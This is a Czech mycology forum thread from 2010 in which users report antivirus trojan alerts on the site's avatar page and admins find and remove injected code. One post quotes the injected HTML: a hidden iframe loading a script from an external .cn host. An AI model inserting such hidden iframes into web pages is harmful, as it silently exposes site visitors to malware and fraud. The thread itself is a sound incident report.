Obsah fóra DAMyko
Domov Amatérských Mykologů
Trojský kůň
odeslat nové téma   Odpovědět na téma   Obsah fora -> Kancelář - Vše ohledně provozu těchto stránek
Zobrazit předchozí téma :: Zobrazit následující téma  
Autor Zpráva
Lenochod

PříspěvekZaslal: pá 04. června 2010 9:24
  Předmět: Trojský kůň
Odpovědět s citátem Url adresa tohoto příspěvku

Zabrousil jsem bez konkrétního plánu,spíš jen tak pro okouknutí a přehodnocení do Nastavení (svého profilu),klikl na Zobrazit galerii postaviček-žádná tam není-není z čeho vybrat,přesto jsem zkusmo klikl na Zvolit obrázek postavičky a .....:Vyskočilo okénko hlášení o Trojském koni + zvukový signál :TÚÚúúúú.....TÚÚúúúú.....TÚÚúúúú.Rychle jsem odklikl Přerušit spojení.A teď - vím,asi to byla blbost,omlouvám se, ale několikrát jsem to zopakoval (stává se mi to řídce,nějak jsem nemohl uvěřit) - vždy stejné hlášení,vždy jsem rychle odklikl Přerušit spojení.
Zobrazit informace o autorovi Odeslat soukromou zprávu
mat60
Čestný člen

PříspěvekZaslal: pá 04. června 2010 9:44 Odpovědět s citátem Url adresa tohoto příspěvku

ESET tam opravdu něco nachází, píše Iframe.B.GEN virus
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail Zobrazit autorovy WWW stránky
Bob
Site Admin

PříspěvekZaslal: pá 04. června 2010 11:29 Odpovědět s citátem Url adresa tohoto příspěvku

Díka za zprávu ... zatím tedy nepoužívejte tuto část webu. Pracuje se na řešení.
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail Zobrazit autorovy WWW stránky
Vlkodlak

PříspěvekZaslal: pá 04. června 2010 16:47 Odpovědět s citátem Url adresa tohoto příspěvku

Nic tam není, aspoň teď ne. Pravděpodobně se jedná o generický falešný poplach.
Lenochod

PříspěvekZaslal: pá 04. června 2010 17:12 Odpovědět s citátem Url adresa tohoto příspěvku

No,nevím.Teď jsem to přes všechno varování zkusil - výsledek ?:Avast-varování- byl nalezen trojský kůň.Jestli je to planý poplach,fakt nedovedu posoudit.
Vlkodlak

PříspěvekZaslal: pá 04. června 2010 17:39 Odpovědět s citátem Url adresa tohoto příspěvku

Tak je tam toto:

kód:

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>

<body bgcolor="#FFFFFF" text="#000000"><iframe src="http://mixmaxgroup.cn:8080/ts/in.cgi?pepsi72" width=125 height=125 style="visibility: hidden"></iframe>

</body>
</html>

Upozornění na iframe se mi objevilo pouze při použití Internet Exploreru (který nepoužívám Smile ), ve Firefoxu ne. Samotná vložená adresa je slušným prohlížečem blokována tak jako tak a navíc neexistuje.

V kódu damyka ovšem být nemá, to je jasné.
Lupo
Site Admin

PříspěvekZaslal: so 05. června 2010 0:18 Odpovědět s citátem Url adresa tohoto příspěvku

Kód s uvedeným odkazem jsem našel a smazal. Zkuste se tam kouknout někdo, kdo ho předtím detekoval. Našel jsem ho totiž na jiném místě, než uvádíte.
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail
Vlkodlak

PříspěvekZaslal: so 05. června 2010 1:36
  Předmět: Re: Trojský kůň
Odpovědět s citátem Url adresa tohoto příspěvku

pá 04. června 2010 9:24 Lenochod napsal:
...vždy jsem rychle odklikl Přerušit spojení.

To mě dovede pobavit, když si uživatel myslí, že dovede rychleji klikat, než počítač pracovat. Very Happy Very Happy Very Happy
Lenochod

PříspěvekZaslal: ne 06. června 2010 18:54 Odpovědět s citátem Url adresa tohoto příspěvku

citace:
To mě dovede pobavit, když si uživatel myslí, že dovede rychleji klikat, než počítač pracovat. Very Happy Very Happy Very Happy

To nemyslím a netvrdím,jako laikovi mi přišla nejvíc vhodná tahle volba.
Teď jsem do toho znovu naběhl a ta hláška znovu na stejném místě vyskočila (o jiném nevím).Mohu tedy odkliknout falešný poplach ?
Vlkodlak

PříspěvekZaslal: po 07. června 2010 17:55 Odpovědět s citátem Url adresa tohoto příspěvku

Ano.

On to není úplně falešný poplach, reaguje na skrytý iframe, který obsahuje odkaz, vedený v seznamu podezřelých URL adres. Ve většině případů jsou skryté iframy známkou napadení zobrazované www stránky a snaží se o přesměrování uživatele na jinou adresu nebo o otevření popup okna, případně o jiné podezřelé činnosti bez vědomí a souhlasu uživatele. Také lze takto podvodně získat prechy za reklamu, která se ovšem uživatelům nikdy nezobrazila. Atd.

Admini, je to tam pořád, přesně na výše popisovaném místě.
Lupo
Site Admin

PříspěvekZaslal: út 08. června 2010 19:05 Odpovědět s citátem Url adresa tohoto příspěvku

Tak už je to komplet vyčištěné.
Zobrazit informace o autorovi Odeslat soukromou zprávu Odeslat e-mail
Lenochod

PříspěvekZaslal: út 08. června 2010 23:04 Odpovědět s citátem Url adresa tohoto příspěvku

citace:
Tak už je to komplet vyčištěné.

Chystal jsem se odklepnout falešný poplach ale pak jsem to odložil.Teď jsem tam vletěl,zkusil to a ani ťuk,ticho po pěšině.Potvrzuju.OK.
Všem zúčastněným velký dík !
Zobrazit příspěvky z předchozích:   
odeslat nové téma   Odpovědět na téma   Obsah fora -> Kancelář - Vše ohledně provozu těchto stránek Časy uváděny v GMT + 1 hodina
Strana 1 z 1

Přejdi na:  
Můžete odesílat nové téma do tohoto fóra
Můžete odpovídat na témata v tomto fóru